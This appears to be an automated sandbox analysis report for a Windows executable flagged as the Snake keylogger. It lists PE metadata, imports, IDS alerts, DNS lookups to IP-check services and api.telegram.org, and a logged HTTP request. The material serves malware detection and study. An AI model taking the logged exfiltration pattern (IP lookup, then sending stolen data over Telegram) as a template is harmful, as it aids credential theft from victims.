                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x67490B7F [Fri Nov 29 00:31:59 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:1
                                                                          File Version Major:5
                                                                          File Version Minor:1
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:1
                                                                          Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                          Instruction
                                                                          call 00007F65092E590Fh
                                                                          jmp 00007F65092D8924h
                                                                          int3
                                                                          int3
                                                                          push edi
                                                                          push esi
                                                                          mov esi, dword ptr [esp+10h]
                                                                          mov ecx, dword ptr [esp+14h]
                                                                          mov edi, dword ptr [esp+0Ch]
                                                                          mov eax, ecx
                                                                          mov edx, ecx
                                                                          add eax, esi
                                                                          cmp edi, esi
                                                                          jbe 00007F65092D8AAAh
                                                                          cmp edi, eax
                                                                          jc 00007F65092D8E0Eh
                                                                          bt dword ptr [004C0158h], 01h
                                                                          jnc 00007F65092D8AA9h
                                                                          rep movsb
                                                                          jmp 00007F65092D8DBCh
                                                                          cmp ecx, 00000080h
                                                                          jc 00007F65092D8C74h
                                                                          mov eax, edi
                                                                          xor eax, esi
                                                                          test eax, 0000000Fh
                                                                          jne 00007F65092D8AB0h
                                                                          bt dword ptr [004BA370h], 01h
                                                                          jc 00007F65092D8F80h
                                                                          bt dword ptr [004C0158h], 00000000h
                                                                          jnc 00007F65092D8C4Dh
                                                                          test edi, 00000003h
                                                                          jne 00007F65092D8C5Eh
                                                                          test esi, 00000003h
                                                                          jne 00007F65092D8C3Dh
                                                                          bt edi, 02h
                                                                          jnc 00007F65092D8AAFh
                                                                          mov eax, dword ptr [esi]
                                                                          sub ecx, 04h
                                                                          lea esi, dword ptr [esi+04h]
                                                                          mov dword ptr [edi], eax
                                                                          lea edi, dword ptr [edi+04h]
                                                                          bt edi, 03h
                                                                          jnc 00007F65092D8AB3h
                                                                          movq xmm1, qword ptr [esi]
                                                                          sub ecx, 08h
                                                                          lea esi, dword ptr [esi+08h]
                                                                          movq qword ptr [edi], xmm1
                                                                          lea edi, dword ptr [edi+08h]
                                                                          test esi, 00000007h
                                                                          je 00007F65092D8B05h
                                                                          bt esi, 03h
                                                                          jnc 00007F65092D8B58h
                                                                          movdqa xmm1, dqword ptr [esi+00h]
                                                                          Programming Language:
                                                                          • [ C ] VS2008 SP1 build 30729
                                                                          • [IMP] VS2008 SP1 build 30729
                                                                          • [ASM] VS2012 UPD4 build 61030
                                                                          • [RES] VS2012 UPD4 build 61030
                                                                          • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x4b66c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x110000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x4b66c | 0x4b800 | a9470ad6003f48e8a74f62c0fd0fe37d | False | 0.912186982615894 | data | 7.859510082934406 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x110000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x42971 | data |  |  | 1.0003336351937466
RT_GROUP_ICON | 0x10f12c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x10f1a4 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x10f1b8 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x10f1cc | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x10f1e0 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x10f2bc | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
                                                                          DLLImport
                                                                          WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                          COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                          USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                          UxTheme.dllIsThemeActive
                                                                          KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, 
IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll: SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll: SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll: RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T09:15:24.902370+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.12 | 49711 | 193.122.6.168 | 80 | TCP
2025-01-11T09:15:30.980555+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.12 | 49711 | 193.122.6.168 | 80 | TCP
2025-01-11T09:15:31.627549+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.12 | 49713 | 149.154.167.220 | 443 | TCP
2025-01-11T09:15:31.912304+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.12 | 49713 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 09:15:23.952826023 CET | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Jan 11, 2025 09:15:23.957793951 CET | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Jan 11, 2025 09:15:23.957865953 CET | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Jan 11, 2025 09:15:23.958123922 CET | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Jan 11, 2025 09:15:23.962959051 CET | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Jan 11, 2025 09:15:24.665743113 CET | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Jan 11, 2025 09:15:24.669775963 CET | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Jan 11, 2025 09:15:24.674614906 CET | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Jan 11, 2025 09:15:24.857296944 CET | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Jan 11, 2025 09:15:24.902369976 CET | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Jan 11, 2025 09:15:24.934595108 CET | 49712 | 443 | 192.168.2.12 | 104.21.16.1
Jan 11, 2025 09:15:24.934629917 CET | 443 | 49712 | 104.21.16.1 | 192.168.2.12
Jan 11, 2025 09:15:24.934727907 CET | 49712 | 443 | 192.168.2.12 | 104.21.16.1
Jan 11, 2025 09:15:24.962045908 CET | 49712 | 443 | 192.168.2.12 | 104.21.16.1
Jan 11, 2025 09:15:24.962059975 CET | 443 | 49712 | 104.21.16.1 | 192.168.2.12
Jan 11, 2025 09:15:25.462714911 CET | 443 | 49712 | 104.21.16.1 | 192.168.2.12
Jan 11, 2025 09:15:25.462888002 CET | 49712 | 443 | 192.168.2.12 | 104.21.16.1
Jan 11, 2025 09:15:25.468941927 CET | 49712 | 443 | 192.168.2.12 | 104.21.16.1
Jan 11, 2025 09:15:25.468970060 CET | 443 | 49712 | 104.21.16.1 | 192.168.2.12
Jan 11, 2025 09:15:25.469388008 CET | 443 | 49712 | 104.21.16.1 | 192.168.2.12
Jan 11, 2025 09:15:25.511765957 CET | 49712 | 443 | 192.168.2.12 | 104.21.16.1
Jan 11, 2025 09:15:25.519706964 CET | 49712 | 443 | 192.168.2.12 | 104.21.16.1
Jan 11, 2025 09:15:25.563330889 CET | 443 | 49712 | 104.21.16.1 | 192.168.2.12
Jan 11, 2025 09:15:25.633475065 CET | 443 | 49712 | 104.21.16.1 | 192.168.2.12
Jan 11, 2025 09:15:25.633665085 CET | 443 | 49712 | 104.21.16.1 | 192.168.2.12
Jan 11, 2025 09:15:25.633739948 CET | 49712 | 443 | 192.168.2.12 | 104.21.16.1
Jan 11, 2025 09:15:25.640852928 CET | 49712 | 443 | 192.168.2.12 | 104.21.16.1
Jan 11, 2025 09:15:30.742084026 CET | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Jan 11, 2025 09:15:30.749192953 CET | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Jan 11, 2025 09:15:30.929501057 CET | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Jan 11, 2025 09:15:30.941095114 CET | 49713 | 443 | 192.168.2.12 | 149.154.167.220
Jan 11, 2025 09:15:30.941134930 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.12
Jan 11, 2025 09:15:30.941196918 CET | 49713 | 443 | 192.168.2.12 | 149.154.167.220
Jan 11, 2025 09:15:30.941725969 CET | 49713 | 443 | 192.168.2.12 | 149.154.167.220
Jan 11, 2025 09:15:30.941736937 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.12
Jan 11, 2025 09:15:30.980555058 CET | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Jan 11, 2025 09:15:31.582798958 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.12
Jan 11, 2025 09:15:31.582932949 CET | 49713 | 443 | 192.168.2.12 | 149.154.167.220
Jan 11, 2025 09:15:31.585123062 CET | 49713 | 443 | 192.168.2.12 | 149.154.167.220
Jan 11, 2025 09:15:31.585133076 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.12
Jan 11, 2025 09:15:31.585366964 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.12
Jan 11, 2025 09:15:31.586960077 CET | 49713 | 443 | 192.168.2.12 | 149.154.167.220
Jan 11, 2025 09:15:31.627329111 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.12
Jan 11, 2025 09:15:31.627480030 CET | 49713 | 443 | 192.168.2.12 | 149.154.167.220
Jan 11, 2025 09:15:31.627487898 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.12
Jan 11, 2025 09:15:31.912329912 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.12
Jan 11, 2025 09:15:31.912396908 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.12
Jan 11, 2025 09:15:31.912448883 CET | 49713 | 443 | 192.168.2.12 | 149.154.167.220
Jan 11, 2025 09:15:31.913837910 CET | 49713 | 443 | 192.168.2.12 | 149.154.167.220
Jan 11, 2025 09:16:35.929038048 CET | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Jan 11, 2025 09:16:35.929111004 CET | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Jan 11, 2025 09:17:05.652887106 CET | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Jan 11, 2025 09:17:05.657831907 CET | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 09:15:23.929912090 CET | 54773 | 53 | 192.168.2.12 | 1.1.1.1
Jan 11, 2025 09:15:23.938246965 CET | 53 | 54773 | 1.1.1.1 | 192.168.2.12
Jan 11, 2025 09:15:24.926006079 CET | 63057 | 53 | 192.168.2.12 | 1.1.1.1
Jan 11, 2025 09:15:24.933347940 CET | 53 | 63057 | 1.1.1.1 | 192.168.2.12
Jan 11, 2025 09:15:30.933702946 CET | 63598 | 53 | 192.168.2.12 | 1.1.1.1
Jan 11, 2025 09:15:30.940347910 CET | 53 | 63598 | 1.1.1.1 | 192.168.2.12
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 09:15:23.929912090 CET | 192.168.2.12 | 1.1.1.1 | 0x1721 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:24.926006079 CET | 192.168.2.12 | 1.1.1.1 | 0x2187 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:30.933702946 CET | 192.168.2.12 | 1.1.1.1 | 0x29a0 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 09:15:23.938246965 CET | 1.1.1.1 | 192.168.2.12 | 0x1721 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:15:23.938246965 CET | 1.1.1.1 | 192.168.2.12 | 0x1721 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:23.938246965 CET | 1.1.1.1 | 192.168.2.12 | 0x1721 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:23.938246965 CET | 1.1.1.1 | 192.168.2.12 | 0x1721 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:23.938246965 CET | 1.1.1.1 | 192.168.2.12 | 0x1721 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:23.938246965 CET | 1.1.1.1 | 192.168.2.12 | 0x1721 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:24.933347940 CET | 1.1.1.1 | 192.168.2.12 | 0x2187 | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:24.933347940 CET | 1.1.1.1 | 192.168.2.12 | 0x2187 | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:24.933347940 CET | 1.1.1.1 | 192.168.2.12 | 0x2187 | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:24.933347940 CET | 1.1.1.1 | 192.168.2.12 | 0x2187 | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:24.933347940 CET | 1.1.1.1 | 192.168.2.12 | 0x2187 | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:24.933347940 CET | 1.1.1.1 | 192.168.2.12 | 0x2187 | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:24.933347940 CET | 1.1.1.1 | 192.168.2.12 | 0x2187 | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:15:30.940347910 CET | 1.1.1.1 | 192.168.2.12 | 0x29a0 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.12 | 49711 | 193.122.6.168 | 80 | 6892 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:15:23.958123922 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 09:15:24.665743113 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 08:15:24 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
